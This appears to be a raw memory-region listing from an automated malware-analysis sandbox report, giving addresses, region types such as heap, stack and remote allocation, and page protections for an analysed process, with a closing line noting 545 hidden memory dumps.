heap
page read and write
24DB9187000
heap
page read and write
248E68F0000
trusted library allocation
page read and write
248E6C90000
remote allocation
page read and write
24DB91BA000
heap
page read and write
248E68D0000
trusted library allocation
page read and write
7FFAACBB2000
trusted library allocation
page read and write
43E000
remote allocation
page execute and read and write
1F882C0F000
trusted library allocation
page read and write
25B803E1000
trusted library allocation
page read and write
2AA0000
trusted library allocation
page read and write
24DB91B7000
heap
page read and write
24DBB222000
heap
page read and write
24DBB2EE000
heap
page read and write
248E6A1F000
heap
page read and write
2C5D000
trusted library allocation
page read and write
94B1238000
stack
page read and write
7FFAACD50000
trusted library allocation
page read and write
1F880D29000
heap
page read and write
52DE000
stack
page read and write
B73B97E000
unkown
page readonly
24DB9191000
heap
page read and write
2A8B000
trusted library allocation
page execute and read and write
25B80223000
trusted library allocation
page read and write
8F57BE000
unkown
page read and write
24DB91C9000
heap
page read and write
248E6870000
trusted library allocation
page read and write
25B821E1000
trusted library allocation
page read and write
DB0000
heap
page read and write
24DBB244000
heap
page read and write
7FFAACE80000
trusted library allocation
page read and write
103F000
heap
page read and write
94B200D000
stack
page read and write
6EC41000
unkown
page execute read
24DB91FA000
heap
page read and write
24DB91CE000
heap
page read and write
1F89AC4B000
heap
page read and write
5FE0000
heap
page read and write
1F880D0B000
heap
page read and write
24DB9186000
heap
page read and write
24DBAE00000
heap
page read and write
248E1370000
trusted library allocation
page read and write
94B0E7E000
stack
page read and write
248E6B0A000
heap
page read and write
2E60000
trusted library allocation
page read and write
1F88315C000
trusted library allocation
page read and write
1F89ACBA000
heap
page read and write
7FFAACD61000
trusted library allocation
page read and write
24DB920A000
heap
page read and write
248E6A1F000
heap
page read and write
248E1BA0000
trusted library section
page readonly
248E6A4C000
heap
page read and write
8ECB8FE000
stack
page read and write
24DB917B000
heap
page read and write
6045000
heap
page read and write
24DBB2EE000
heap
page read and write
24DB91D7000
heap
page read and write
2A87000
trusted library allocation
page execute and read and write
94B15BB000
stack
page read and write
25B85D58000
trusted library allocation
page read and write
11AD000
trusted library allocation
page execute and read and write
24DBAC2A000
heap
page read and write
B73BD7E000
unkown
page readonly
25B84958000
trusted library allocation
page read and write
6EC40000
unkown
page readonly
94B107E000
stack
page read and write
8F56FE000
stack
page read and write
B73B37E000
unkown
page readonly
248E6C30000
trusted library allocation
page read and write
B73B57E000
unkown
page readonly
1F8831F5000
trusted library allocation
page read and write
248E6B00000
heap
page read and write
B73B87E000
stack
page read and write
248E147A000
heap
page read and write
5280000
heap
page read and write
1F881040000
heap
page read and write
6018000
heap
page read and write
24DB91C2000
heap
page read and write
24DB924E000
heap
page read and write
1F8832FA000
trusted library allocation
page read and write
24DB91B5000
heap
page read and write
3DA9000
trusted library allocation
page read and write
2B2C000
stack
page read and write
2E68000
trusted library allocation
page read and write
25B85358000
trusted library allocation
page read and write
7FFAACC66000
trusted library allocation
page read and write
24DB924E000
heap
page read and write
248E6C20000
trusted library allocation
page read and write
24DB91BF000
heap
page read and write
25B83CF5000
trusted library allocation
page read and write
25B835E1000
trusted library allocation
page read and write
3DED000
trusted library allocation
page read and write
24DBB250000
heap
page read and write
24DB91C8000
heap
page read and write
248E1BB0000
trusted library section
page readonly
B73AF7E000
unkown
page readonly
1F880CCF000
heap
page read and write
24DB91A9000
heap
page read and write
248E6AD2000
heap
page read and write
94B0FFE000
stack
page read and write
2E4E000
trusted library allocation
page read and write
1F880C40000
heap
page read and write
248E1502000
heap
page read and write
248E6AC0000
heap
page read and write
25B8007B000
trusted library allocation
page read and write
2A70000
trusted library allocation
page read and write
24DB924E000
heap
page read and write
2B30000
trusted library allocation
page execute and read and write
8F583F000
stack
page read and write
1F892BF1000
trusted library allocation
page read and write
24DB924E000
heap
page read and write
24DBAC23000
heap
page read and write
25B817E1000
trusted library allocation
page read and write
1037000
heap
page read and write
24DB9478000
heap
page read and write
1F89AD90000
heap
page execute and read and write
1F882680000
trusted library allocation
page read and write
C5A000
stack
page read and write
1F880D56000
heap
page read and write
8F5BBF000
stack
page read and write
94B0F7D000
stack
page read and write
7FFAACD92000
trusted library allocation
page read and write
248E6ABE000
heap
page read and write
24DB9181000
heap
page read and write
1F89AD33000
heap
page read and write
6003000
heap
page read and write
24DB924E000
heap
page read and write
248E1340000
heap
page read and write
1F880CC0000
heap
page read and write
1F880D9B000
heap
page read and write
1F89AC46000
heap
page read and write
24DB91CD000
heap
page read and write
1F882728000
heap
page read and write
B73A277000
stack
page read and write
7FFAACED0000
trusted library allocation
page read and write
248E1D1A000
heap
page read and write
B73A77E000
unkown
page readonly
8F55FC000
stack
page read and write
24DB9206000
heap
page read and write
24DB9230000
heap
page read and write
24DB91B5000
heap
page read and write
1F882D10000
trusted library allocation
page read and write
1F89AD26000
heap
page read and write
24DB924E000
heap
page read and write
2A80000
trusted library allocation
page read and write
24DBB151000
heap
page read and write
248E1380000
trusted library section
page read and write
400000
remote allocation
page execute and read and write
248E14A1000
heap
page read and write
5920000
trusted library allocation
page read and write
24DBB2EE000
heap
page read and write
11B6000
heap
page read and write
7FFAACD80000
trusted library allocation
page execute and read and write
248E6930000
trusted library allocation
page read and write
2B98000
trusted library allocation
page read and write
7FFB226C1000
unkown
page execute read
8F547E000
stack
page read and write
7FFAACE50000
trusted library allocation
page read and write
8F51DE000
stack
page read and write
2DB5000
trusted library allocation
page read and write
248E14FF000
heap
page read and write
24DB91CD000
heap
page read and write
248E6A4F000
heap
page read and write
1F882FFD000
trusted library allocation
page read and write
25B863FC000
trusted library allocation
page read and write
6450000
trusted library allocation
page read and write
248E1D5A000
heap
page read and write
24DB91BF000
heap
page read and write
248E147D000
heap
page read and write
1F882D1B000
trusted library allocation
page read and write
94B1F8E000
stack
page read and write
248E6A60000
heap
page read and write
248E6AE3000
heap
page read and write
24DB91FA000
heap
page read and write
248E6C40000
trusted library allocation
page read and write
7FFB226C0000
unkown
page readonly
25B803DD000
trusted library allocation
page read and write
1F8831A8000
trusted library allocation
page read and write
1F89AC40000
heap
page read and write
B73B3FE000
stack
page read and write
B73BB7E000
unkown
page readonly
248E2841000
trusted library allocation
page read and write
24DBB26B000
heap
page read and write
248E1F91000
trusted library allocation
page read and write
24DB924E000
heap
page read and write
24DB91FC000
heap
page read and write
2C3B000
trusted library allocation
page read and write
1F882C3F000
trusted library allocation
page read and write
25B860E9000
trusted library allocation
page read and write
248E68F1000
trusted library allocation
page read and write
2B50000
trusted library allocation
page read and write
11A0000
trusted library allocation
page read and write
24DB9248000
heap
page read and write
B73B47E000
unkown
page readonly
2A6D000
trusted library allocation
page execute and read and write
248E6920000
trusted library allocation
page read and write
24DB91EF000
heap
page read and write
F68000
heap
page read and write
248E1D13000
heap
page read and write
B73A87C000
stack
page read and write
7FFAACC96000
trusted library allocation
page execute and read and write
1F883173000
trusted library allocation
page read and write
6EC56000
unkown
page readonly
94B0BEE000
stack
page read and write
1F880CA0000
heap
page read and write
94B0B62000
stack
page read and write
248E1C00000
heap
page read and write
1F880D0F000
heap
page read and write
7FFAACE40000
trusted library allocation
page read and write
3D81000
trusted library allocation
page read and write
6440000
trusted library allocation
page read and write
1F882C62000
trusted library allocation
page read and write
7FFAACE20000
trusted library allocation
page read and write
B73B2FE000
stack
page read and write
B73BA7D000
stack
page read and write
526E000
stack
page read and write
5380000
heap
page read and write
24DB91D1000
heap
page read and write
248E1D02000
heap
page read and write
8F577F000
stack
page read and write
94B153E000
stack
page read and write
58DD000
stack
page read and write
7FFB226E5000
unkown
page readonly
24DB9181000
heap
page read and write
B73B27E000
unkown
page readonly
24DB91FA000
heap
page read and write
7FFAACE30000
trusted library allocation
page read and write
248E6A00000
heap
page read and write
248E6A2C000
heap
page read and write
24DB91B5000
heap
page read and write
7FFAACBC0000
trusted library allocation
page read and write
5290000
heap
page execute and read and write
2A7A000
trusted library allocation
page execute and read and write
1F882D0D000
trusted library allocation
page read and write
1F882D1E000
trusted library allocation
page read and write
B73AA7C000
stack
page read and write
7FFAACDE0000
trusted library allocation
page read and write
248E2420000
trusted library allocation
page read and write
248E14B9000
heap
page read and write
2AEE000
stack
page read and write
1F882726000
heap
page read and write
2E96000
trusted library allocation
page read and write
11A4000
trusted library allocation
page read and write
6420000
trusted library allocation
page read and write
587F000
stack
page read and write
1F880D51000
heap
page read and write
248E148F000
heap
page read and write
4E7D000
stack
page read and write
2D7F000
stack
page read and write
2C51000
trusted library allocation
page read and write
8ECBCFF000
stack
page read and write
520C000
stack
page read and write
F60000
heap
page read and write
1F880DB6000
heap
page read and write
248E6930000
trusted library allocation
page read and write
248E7000000
heap
page read and write
B73B1FE000
stack
page read and write
6750000
heap
page read and write
7FFB226C1000
unkown
page execute read
B73AC7B000
stack
page read and write
24DB91FA000
heap
page read and write
248E1413000
heap
page read and write
577E000
stack
page read and write
1F880C30000
heap
page read and write
8ECBEFE000
stack
page read and write
24DB9090000
heap
page read and write
25B86DFC000
trusted library allocation
page read and write
25B860FE000
trusted library allocation
page read and write
24DB924E000
heap
page read and write
248E69C0000
trusted library allocation
page read and write
7FFB226E0000
unkown
page read and write
8ECC0FF000
stack
page read and write
248E1310000
heap
page read and write
6EC5D000
unkown
page read and write
7FFAACDD0000
trusted library allocation
page read and write
24DB923C000
heap
page read and write
1F882D61000
trusted library allocation
page read and write
248E6AF4000
heap
page read and write
B73B77E000
unkown
page readonly
2C30000
trusted library allocation
page read and write
1F882660000
trusted library allocation
page read and write
1160000
heap
page read and write
5373000
heap
page read and write
248E6A8D000
heap
page read and write
24DB947A000
heap
page read and write
5370000
heap
page read and write
24DBAC21000
heap
page read and write
24DB91CE000
heap
page read and write
B73C2FE000
stack
page read and write
248E14A3000
heap
page read and write
248E1440000
heap
page read and write
7FFB226E5000
unkown
page readonly
24DB91C9000
heap
page read and write
B73B4FE000
stack
page read and write
FF5000
heap
page read and write
1F88301D000
trusted library allocation
page read and write
1F882690000
heap
page execute and read and write
248E6A14000
heap
page read and write
2A60000
trusted library allocation
page read and write
24DB91FA000
heap
page read and write
94B10FE000
stack
page read and write
248E2240000
trusted library allocation
page read and write
7FFAACD6A000
trusted library allocation
page read and write
24DB91E8000
heap
page read and write
24DBB165000
heap
page read and write
1F880D11000
heap
page read and write
248E1BE0000
trusted library section
page readonly
8F5C3B000
stack
page read and write
248E6A42000
heap
page read and write
6460000
trusted library allocation
page execute and read and write
2B40000
trusted library allocation
page read and write
25B80DE1000
trusted library allocation
page read and write
24DBAC36000
heap
page read and write
2C70000
heap
page read and write
24DB91EC000
heap
page read and write
24DB91DA000
heap
page read and write
1F89B170000
heap
page read and write
248E6B02000
heap
page read and write
25B80001000
trusted library allocation
page read and write
24DB947B000
heap
page read and write
1F882D21000
trusted library allocation
page read and write
25B83D99000
trusted library allocation
page read and write
7FFAACC6C000
trusted library allocation
page execute and read and write
248E6910000
trusted library allocation
page read and write
7FFAACDA0000
trusted library allocation
page execute and read and write
24DB90B0000
heap
page read and write
7FFAACC70000
trusted library allocation
page execute and read and write
24DB9186000
heap
page read and write
2E48000
trusted library allocation
page read and write
EA0000
heap
page read and write
7FFAACDF0000
trusted library allocation
page read and write
248E6A40000
trusted library allocation
page read and write
24DB9186000
heap
page read and write
24DB91E3000
heap
page read and write
1F89AD2D000
heap
page read and write
B739C9B000
stack
page read and write
1F882BF1000
trusted library allocation
page read and write
591E000
stack
page read and write
24DBB2BE000
heap
page read and write
8F5ABE000
stack
page read and write
7FFAACEB0000
trusted library allocation
page read and write
5360000
trusted library allocation
page read and write
248E1474000
heap
page read and write
24DB9248000
heap
page read and write
24DBB30B000
heap
page read and write
631E000
stack
page read and write
248E2860000
trusted library allocation
page read and write
248E6AF8000
heap
page read and write
25B83F58000
trusted library allocation
page read and write
8F567E000
stack
page read and write
7FFAACCD0000
trusted library allocation
page execute and read and write
1F89AD97000
heap
page execute and read and write
24DBB193000
heap
page read and write
248E1B90000
trusted library section
page readonly
248E1400000
heap
page read and write
1F89AF20000
heap
page read and write
24DBB1C6000
heap
page read and write
B73AB7E000
unkown
page readonly
There are 545 hidden memdumps, click here to show them.